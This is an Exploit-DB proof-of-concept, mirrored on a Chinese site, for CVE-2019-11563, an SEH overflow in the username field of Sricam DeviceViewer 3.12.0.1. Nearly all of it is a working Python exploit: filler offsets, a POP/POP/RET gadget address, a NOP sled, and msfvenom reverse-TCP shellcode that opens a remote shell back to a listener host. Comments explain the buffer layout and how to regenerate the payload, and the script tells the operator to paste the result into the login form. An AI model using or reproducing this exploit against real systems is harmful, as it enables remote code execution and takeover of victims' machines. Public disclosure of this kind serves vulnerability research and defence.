DeviceViewer 3.12.0.1 – ‘user’ SEH Overflow

  • 作者: Hayden Wright
    日期: 2019-04-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46779/
  • # Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)
    # Discovery Date: 25/04/2019
    # Exploit Author: Hayden Wright
    # Vendor Homepage: www.sricam.com/
    # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
    # Version: v3.12.0.1
    # Tested on: Windows XP Pro x64, Windows 7 32bit
    # CVE : CVE-2019-11563
    
    #!/usr/bin/python
    import struct
    
    #------------------------------------------------------------#
    # CVE-2019-11563 #
    ##
    # Sricam DeviceViewer.exe 'username' field SEH overflow#
    # by Hayden Wright #
    ##
    # (*) badchars = '\x00\x0a\x0d'#
    # (*) SEH = 0x6a413969 OFFSET 268#
    # (*) nSEH = 268 -4#
    ##
    # 69901d06   5E   POP ESI  #
    # 69901d07   5F   POP EDI  #
    # 69901d08   C3   RETN     #
    ##
    #------------------------------------------------------------#
    
    #msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh
    
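    # Stage-2 payload: windows/shell_reverse_tcp, generated by the msfvenom
    # command above (LHOST 192.168.1.101, LPORT 1234, -b '\x00\x0a\x0d',
    # EXITFUNC=seh). 351 bytes. It calls back to the author's lab host only;
    # regenerate it for your own listener rather than patching the bytes.
    # Bytes literal so the payload is raw bytes on Python 3 as well as 2
    # (on Python 2 the b prefix is a no-op).
    shellcode = (
        b"\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
        b"\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
        b"\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
        b"\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
        b"\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
        b"\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
        b"\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
        b"\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
        b"\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
        b"\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
        b"\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
        b"\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
        b"\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
        b"\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
        b"\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
        b"\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
        b"\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
        b"\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
        b"\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
        b"\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
        b"\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
        b"\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
        b"\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
        b"\x1d\x0b\x12\x82\x1e\x1e"
    )

    # Badchars from the header: NUL terminates the C string, CR/LF end the
    # input line. None of them may appear anywhere in the final buffer.
    BADCHARS = (b'\x00', b'\x0a', b'\x0d')

    # Total length pushed into the 'user' field. Presumably chosen to sit
    # comfortably past the crash point (the header does not say why 4000).
    max_size = 4000

    # Buffer layout (offsets from the header: SEH at 268, nSEH at 264):
    #   [0..263]   'A' filler                              -> reaches nSEH
    #   [264..267] nSEH: JMP SHORT +6 (EB 06) + 2 pad      -> hops over the SEH slot
    #   [268..271] SEH:  0x69901d06  POP ESI / POP EDI / RET (avformat-54.dll)
    #   [272..287] 16-byte NOP sled
    #   [288..]    shellcode, then 'C' padding up to max_size
    # After the jump at 264, EIP = 266 + 6 = 272, the start of the sled.
    nseh = b'\xeb\x06\x90\x90'
    seh = struct.pack('<I', 0x69901d06)
    # NOTE(review): the gadget address is only good for this exact build
    # with avformat-54.dll loaded at its default base; presumably that DLL
    # is built without SafeSEH/ASLR, but the header does not say — confirm
    # (e.g. with mona's !mona modules) before reusing it elsewhere.

    buf = b'A' * 264
    buf += nseh
    buf += seh
    buf += b'\x90' * 16
    buf += shellcode

    # Fail loudly instead of silently truncating the padding to nothing.
    if len(buf) > max_size:
        raise ValueError('payload is %d bytes, exceeds max_size %d'
                         % (len(buf), max_size))
    buf += b'C' * (max_size - len(buf))

    # msfvenom only encoded the shellcode; nSEH, SEH and the sleds are
    # hand-written, so check the whole buffer rather than just the payload.
    for bad in BADCHARS:
        if bad in buf:
            raise ValueError('badchar %r present in buffer' % (bad,))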
    
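    print('[+] %s bytes buffer created...' % len(buf))

    # Write the buffer to disk for the operator to feed into the login form.
    filename = 'CVE-2019-11563.txt'
    try:
        # Binary mode: buf is raw bytes. Text mode on Windows would expand
        # any 0x0a into 0x0d 0x0a and corrupt the payload (both are badchars
        # and should never be present, but do not rely on that here).
        with open(filename, 'wb') as out:
            out.write(buf)
    except IOError as exc:  # OSError on Python 3, where IOError is an alias
        # Report the reason instead of swallowing every exception.
        print('[!] Could not create file! %s' % exc)
    else:
        print('[+] Evil buffer saved to file: ' + filename)
        # NOTE(review): the buffer contains non-printable bytes (0x90, 0xeb,
        # the encoded shellcode). Pasting it from a text editor through the
        # clipboard may drop or re-encode some of them; if the crash
        # reproduces but the shell never calls back, compare the bytes the
        # field actually received with the file.
        print('[+] Copy + paste its contents into the "user" field and hit login')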